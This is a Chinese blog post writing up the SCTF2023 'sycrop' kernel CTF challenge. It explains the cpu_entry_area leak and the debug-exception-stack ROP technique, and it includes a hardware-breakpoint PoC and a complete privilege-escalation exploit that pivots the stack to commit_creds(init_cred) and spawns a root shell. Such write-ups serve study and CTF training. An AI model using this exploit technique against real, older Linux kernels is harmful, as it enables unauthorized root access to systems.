【cpu_entry_area mapping】SCTF2023-sycrop

已于 2023-10-17 17:21:23 修改
阅读量196 收藏 1
点赞数
分类专栏: # kernel-pwn 文章标签: kernel-pwn
于 2023-10-16 23:01:31 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61670993/article/details/133872074
版权

前言

也算学习到了,这样对 DB_stack 的利用与 pt_regs 很相似。都是利用在用户态切换在内核态时,会保存用户态的上下文信息在内核栈中,所以我们就可以控制部分内核栈中的数据,以此为我们栈迁移做好准备。

程序分析

启动脚本啥的都不用看了,基本都是 smap、smep、kaslr 和 kpti 都开启。然后直接看驱动模块吧。

驱动程序也非常简单,一次任意地址4字节数据泄漏和一次任意地址栈迁移的机会:

 注意最后这里要看汇编代码:

这里直接将 rbx 的值赋给 rsp,然后 ret,而 rbx 直接来自于 rdx,也就是我们传入的第3个参数:

这中间并没有对 rbx 的值再做任何修改,可以自行查看。并且返回前把其他寄存器的值都清空了,所以 pt_regs 就打不了了,但是一般 pt_regs 也会添加一个偏移。

漏洞利用 

这里漏洞已经白给了,按照题目给了漏洞,我们应当就是先泄漏内核基地址,然后在内核空间布置好 ROP 链,最后直接栈迁移过去。

那么这里就有两个难点了:

1、如何泄漏内核基地址

2、在那里布置 ROP 链 

最后选择的是 cpu_entry_area mapping 内核区域。

测试 poc.c:

// poc.c
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <signal.h>
#include <string.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <sched.h>
#include <ctype.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/user.h>
#include <sys/ptrace.h>
#define DB_OFFSET(idx) ((void*)(&(((struct user*)0)->u_debugreg[idx])))
pid_t pid;
int status;
char buf[4];

void set_hbp(void *addr)
{
    if (ptrace(PTRACE_POKEUSER, pid, DB_OFFSET(0), addr) == -1)
    {
        printf("Failed to set dr_0\n");
        kill(pid, 9);
        exit(-1);
    }
    unsigned long dr_7 = (1<<0)|(1<<8)|(1<<16)|(1<<17)|(1<<18)|(1<<19);
    if (ptrace(PTRACE_POKEUSER, pid, DB_OFFSET(7), dr_7) == -1)
    {
        printf("Failed to set dr_7\n");
        kill(pid, 9);
        exit(-1);
    }
}

int main(int argc, char **argv, char **env)
{
    pid = fork();
    if (!pid)
    {
        cpu_set_t cpu_set;
        CPU_ZERO(&cpu_set);
        CPU_SET(0, &cpu_set);
        sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);

        ptrace(PTRACE_TRACEME, 0, NULL, NULL);
        raise(SIGSTOP);
        __asm__(
        "mov r15,   0x11111111;"
        "mov r14,   0x22222222;"
        "mov r13,   0x33333333;"
        "mov r12,   0x44444444;"
        "mov rbp,   0x55555555;"
        "mov rbx,   0x66666666;"
        "mov r11,   0x77777777;"
        "mov r10,   0x88888888;"
        "mov r9,    0x99999999;"
        "mov r8,    0xaaaaaaaa;"
        "mov rax,   0xbbbbbbbb;"
        "mov rcx,   0xcccccccc;"
        "mov rdx,   0xdddddddd;"
        "mov rsi,   0xeeeeeeee;"
        "mov rdi,   0xffffffff;"
        );
        buf[0] = 0;
        exit(1);

    }
    waitpid(pid, &status, 0);
    set_hbp(buf);

    ptrace(PTRACE_CONT, pid, NULL, NULL);
    waitpid(pid, &status, 0);

    ptrace(PTRACE_CONT, pid, NULL, NULL);
    waitpid(pid, &status, 0);

    return 0;
}

在 linux 6.2 之前,该区域不参与随机化,并且在该区域存在内核地址,所以我们可以直接泄漏内核基地址:

并且通过下硬件断点在用户态触发的方式,可以将寄存器内容推送到与per cpu entry area固定偏移的DB stack上,所以我们可以在 DB stack 上布置好我们的 ROP 链,最后直接栈迁移过去即可:

exp如下:

#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <signal.h>
#include <string.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <sched.h>
#include <ctype.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/user.h>
#include <sys/ptrace.h>

#define DR_OFFSET(idx) ((void*)(&(((struct user*)0)->u_debugreg[idx])))
size_t swapgs_kpti = 0xFFFFFFFF82000F01;
size_t init_cred =  0xffffffff82a4cbf8;
size_t commit_creds = 0xffffffff810bb5b0;
size_t pop_rdi = 0xffffffff81002c9d; // pop rdi ; ret

int fd;
pid_t pid;
int status;
char buf[4];
size_t kernel_offset;

size_t leak(size_t addr) { return ioctl(fd, 0x5555, addr); }
void set_rsp(size_t rsp) { ioctl(fd, 0x6666, rsp); }

void err_exit(char *msg)
{
    printf("\033[31m\033[1m[x] Error at: \033[0m%s\n", msg);
    sleep(5);
    exit(EXIT_FAILURE);
}

void info(char *msg)
{
    printf("\033[32m\033[1m[+] %s\n\033[0m", msg);
}

void hexx(char *msg, size_t value)
{
    printf("\033[32m\033[1m[+] %s: %#lx\n\033[0m", msg, value);
}

void bind_core(int core)
{
    cpu_set_t cpu_set;
    CPU_ZERO(&cpu_set);
    CPU_SET(core, &cpu_set);
    sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);

    printf("\033[34m\033[1m[*] Process binded to core \033[0m%d\n", core);
}

void set_hbp(void *addr)
{
        if (ptrace(PTRACE_POKEUSER, pid, DR_OFFSET(0), addr) == -1)
        {
                printf("Failed to set dr_0\n");
                kill(pid, 9);
                exit(-1);
        }
        unsigned long dr_7 = (1<<0)|(1<<8)|(1<<16)|(1<<17)|(1<<18)|(1<<19);
        if (ptrace(PTRACE_POKEUSER, pid, DR_OFFSET(7), dr_7) == -1)
        {
                printf("Failed to set dr_7\n");
                kill(pid, 9);
                exit(-1);
        }
}


int main(int argc, char **argv, char **env)
{
        fd = open("/dev/seven", O_RDWR);
        if (fd < 0) err_exit("Open dev file");
        kernel_offset = (leak(0xfffffe0000000000+4)&0xffffffff) - 0x82008e00;
        hexx("kernel_offset", kernel_offset);
        swapgs_kpti += kernel_offset;
        init_cred += kernel_offset;
        commit_creds += kernel_offset;
        pop_rdi += kernel_offset;

        pid = fork();
        if (!pid)
        {
                bind_core(0);
                ptrace(PTRACE_TRACEME, 0, NULL, NULL);
                raise(SIGSTOP);
                __asm__ volatile(
                "mov rax, pop_rdi;"
                "mov rcx, init_cred;"
                "mov rdx, commit_creds;"
                "mov rsi, swapgs_kpti;"
                );
                buf[0] = 1;
                set_rsp(0xfffffe0000010fa8);
                hexx("UID", getuid());
                system("/bin/sh");
                exit(0);
        }

        waitpid(pid, &status, 0);
        set_hbp(buf);

        ptrace(PTRACE_CONT, pid, NULL, NULL);
        waitpid(pid, &status, 0);

        ptrace(PTRACE_CONT, pid, NULL, NULL);
        waitpid(pid, &status, 0);
        return 0;
}

最后可以稳定提权:

XiaozaYa
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
linux内核那些事之虚拟空间划分
weixin_42730667的博客
08-06 715
linux虚拟空间划分 一般操作系统为了提供远超实际物理内存的空间,提供了虚拟空间概念。即虽然实际系统中的物理内存比较小,但是通过将整个空间进行一个虚拟抽象能够为每个进程提供远远超过实际物理内存的空间,这样就给每个进程提供了一个假象 :“每个进程都拥有整个系统的空间”。虚拟空间的好处就不必多说,一般操作系统的课程上都是着重讲解。linux内核中将整个虚拟空间划分为内核空间和用户空间,每个进程的用户空间是相互隔离,而内核空间是每个进程都相互共享。X86 64系统的地址空间划分在Documentation\x
博通BK5863N_CPU_Address_Mapping.xls
09-06
博通ETC合一芯片BK5863的寄存器列表,芯片集成mcu、5.8G rf、13.56高频,广泛应用在ETC OBU中
【计算机语言】--c++ 内存管理
TU商的博客
10-27 385
随着人工智能,云计算等技术的迅猛发展,让Python,go等新兴语言流行了起来,很多人以为C++可能已经过时了,确实,C++编程语言走到今天已经有将近40年的历史了,但它依然是当今的主流语言,我们可以看一下世界权威编程语言排行榜,C++依然是属于第一梯队,C++在金融交易系统,游戏,数据库,编译器,大型桌面程序,高性能服务器,浏览器,各类编程比赛(ACM-ICPC,Topcoder,Codeforces,Google Code Jam)等领域任然是主力军。在各个大厂情况,C++也是很多大厂主力编程语言,国外
Linux内核深入理解中断和异常(2):初步中断处理-中断加载
RToax
03-24 1866
Linux内核深入理解中断和异常(2):初步中断处理-中断加载 rtoax 2021年3月 1. 总体概览 关于idt_table结构的填充,在5.10.13中流程为: idt_setup_early_traps();/* 中断描述符表 */ 上面函数实现很简单: void __init idt_setup_early_traps(void)/* 中断描述符表 */ { idt_setup_from_table(idt_table, early_idts, ARRAY_SIZE(early_id
汇编中AREAENTRY理解
魏波
10-11 6528
1、AREA 语法格式: AREA 段名 属性1 ,属性2 ,…… AREA伪指令用于定义一个代码段或数据段。其中,段名若以数字开头,则该段名需用“|”括起来,如:|1_test| 。属性字段表示该代码段(或数据段)的相关属性,多个属性用逗号分隔。常用的属性如下: — CODE 属性:用于定义代码段,默认为READONLY 。 ......
SANGFOR_NGAF_6.8_DNS-Mapping配置指导.pdf
09-25
SANGFOR NGAF 6.8 DNS-Mapping 配置指导 SANGFOR NGAF 6.8 DNS-Mapping 配置指导是深信服公司发布的一份关于 NGAF 6.8 version 的 DNS-Mapping 配置指南。下面是从该指导中总结的重要知识点: 1. 文档说明:文档...
SLM.doc.rar_doc_ofdm_selective mapping_slm-ofdm_选择性映射
09-23
一个降低OFDM峰均比的选择性映射的代码,将后面的压缩包格式去掉,本代码以WORD格式上传的
normal-mapping-master-3.zip_MacOS opengl_journey5ab_mapping_norm
09-23
这个名为"normal-mapping-master-3.zip"的压缩包包含了一个针对MacOS平台、基于OpenGL实现的Normal Mapping示例项目,让我们深入探讨一下这个技术。 Normal Mapping,又称为法线映射,是一种纹理贴图技术,它通过...
ogl_dot3_bump_mapping.zip_bump_bump map_bump mapping_mapping
09-19
OpenGL中的Bump Mapping技术是一种通过模拟表面微小凹凸来增强纹理细节的视觉效果的方法。在3D图形渲染中,这种技术可以显著提升模型的视觉真实感,使其看起来更具质感和立体感。"ogl_dot3_bump_mapping.zip"这个...
Arcmap天地图历史影像插件全国版-免费!免费!
07-22
2024版“天地图”首次开放多时相影像专题,公众可查看32个省级天地图节点近半个世纪的历史影像;本arcmap插件集成了全国天地图历史影像接口,累计上千期。 免费使用。不收费!!不收费!!不收费!!
毕业设计javajsp网上服装商城管理系统ssh-qkrp源码含文档工具包
07-22
毕业设计javajsp网上服装商城管理系统ssh-qkrp源码含文档工具包 后台是ssh框架,页面是jsp,数据库mysql,jdk1.8,开发工具用ecplise、myecplise、sts、idea都可以 通过网上交易这个平台,我们足不出户就可以了解商品的信息和价格,不仅方便了用户也为用户节约了时间,系统的主要功能就是:商品类别管理、商品信息管理、订单管理、会员管理、系统公告管理等。分为管理员用户、会员用户这二种用户平台。 包含:源码、数据库脚本、论文、环境工具包、相同框架项目的安装教程(在说明文档中)
mysql安装配置教程
07-22
MySQL的安装和配置过程可能因操作系统和版本而异,但以下是一些通用的步骤,适用于大多数情况: ### Windows系统安装MySQL: 1. **下载MySQL Installer**: - 访问[MySQL官方网站](https://dev.mysql.com/downloads/installer/)下载MySQL Installer。 2. **启动MySQL Installer**: - 运行下载的安装程序。 3. **选择安装类型**: - 选择“Developer Default”安装类型,它包括MySQL Server和常用的开发工具。 4. **配置MySQL Server**: - 在“Server Instance Configuration”中,输入root用户的密码,并配置MySQL的安装路径。 5. **详细配置**: - 根据需要配置MySQL Server的详细设置,如字符集、默认存储引擎等。 6. **安装**: - 检查配置,然后点击“Execute”开始安装。 7. **安装完成**: -
文化娱乐-微博情感分析-含实验报告-约150行(分词、朴素贝叶斯模型).rar
07-22
数据可视化实例的python实现,可供学习了解
微信小程序+外卖小程序
07-22
微信小程序是一种不需要下载安装即可使用的应用,它实现了应用“触手可及”的梦想,用户扫一扫或搜一下即可打开应用,体现了“用完即走”的理念。 特点: 无需安装和卸载:用户可以直接使用,使用完直接关闭,不会占用桌面空间。 制作成本低:小程序开发门槛相对较低,难度不及APP,能够满足简单的基础应用需求。 内存小、运行快:小程序体积小,加载速度快,操作便利快捷。 容易部署,延展性强:小程序具有丰富的延展性,可以适应多种应用场景。
mysql安装配置教程.docx
最新发布
07-22
mysql安装配置教程
Qt5.12制作的库存管理系统
07-22
基于Qt512开发的商品库存管理系统,利用MySql构建库存管理数据库,设置有商品编号、名称、数量、单价、采购单位、负责人、入库时间、出库时间、备注的记录,使用ODBC数据源连接MySQL,在QT中编写程序,并制作了仓库管理系统的UI界面,利用QT设计师界面构建子界面,完成新增商品、商品入库、商品出库、删除商品、搜索商品、导出数据、商品汇总的功能,实现数据库与UI数据展示等同步。
跑步运动微信小程序.zip
07-22
跑步运动微信小程序设计与实现源码+数据库(高分优秀毕业设计)个人经导师指导并认可通过的高分毕业设计项目,评审分98分。主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者,也可作为课程设计、期末大作业。 跑步运动微信小程序设计与实现源码+数据库(高分优秀毕业设计)个人经导师指导并认可通过的高分毕业设计项目,评审分98分。主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者,也可作为课程设计、期末大作业。 跑步运动微信小程序设计与实现源码+数据库(高分优秀毕业设计)个人经导师指导并认可通过的高分毕业设计项目,评审分98分。主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者,也可作为课程设计、期末大作业。 跑步运动微信小程序设计与实现源码+数据库(高分优秀毕业设计)个人经导师指导并认可通过的高分毕业设计项目,评审分98分。主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者,也可作为课程设计、期末大作业。
河道水面漂浮物视频数据集05
07-22
河道漂浮物数据集05,通过自己采集提供给大家使用,注意本数据集未标注。
keystone-manage bootstrap --bootstrap-password 000000 --bootstrap-admin-url usage: keystone-manage [bootstrap|credential_migrate|credential_rotate|credential_setup|db_sync|db_version|doctor|domain_config_upload|fernet_rotate|fernet_setup|create_jws_keypair|mapping_populate|mapping_purge|mapping_engine|receipt_rotate|receipt_setup|saml_idp_metadata|token_rotate|token_setup|trust_flush] bootstrap [-h] [--bootstrap-username OS_BOOTSTRAP_USERNAME] [--bootstrap-password OS_BOOTSTRAP_PASSWORD] [--bootstrap-project-name OS_BOOTSTRAP_PROJECT_NAME] [--bootstrap-role-name OS_BOOTSTRAP_ROLE_NAME] [--bootstrap-service-name OS_BOOTSTRAP_SERVICE_NAME] [--bootstrap-admin-url OS_BOOTSTRAP_ADMIN_URL] [--bootstrap-public-url OS_BOOTSTRAP_PUBLIC_URL] [--bootstrap-internal-url OS_BOOTSTRAP_INTERNAL_URL] [--bootstrap-region-id OS_BOOTSTRAP_REGION_ID] [--immutable-roles] keystone-manage [bootstrap|credential_migrate|credential_rotate|credential_setup|db_sync|db_version|doctor|domain_config_upload|fernet_rotate|fernet_setup|create_jws_keypair|mapping_populate|mapping_purge|mapping_engine|receipt_rotate|receipt_setup|saml_idp_metadata|token_rotate|token_setup|trust_flush] bootstrap: error: argument --bootstrap-admin-url: expected one argument
06-09
这是一个关于 OpenStack Keystone 的命令行工具 keystone-manage 的使用示例。该命令行工具提供了一系列子命令,可以用于管理 Keystone 的各种功能,例如数据库同步、角色管理、证书管理等等。其中,bootstrap 子命令用于在初始部署时创建 Keystone 的管理员用户和服务。在这个示例中,命令给出了一个参数错误,因为--bootstrap-admin-url 参数需要指定一个参数,但是没有提供。如果你需要了解更多关于 Keystone 的信息,可以参考 OpenStack 官方文档。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值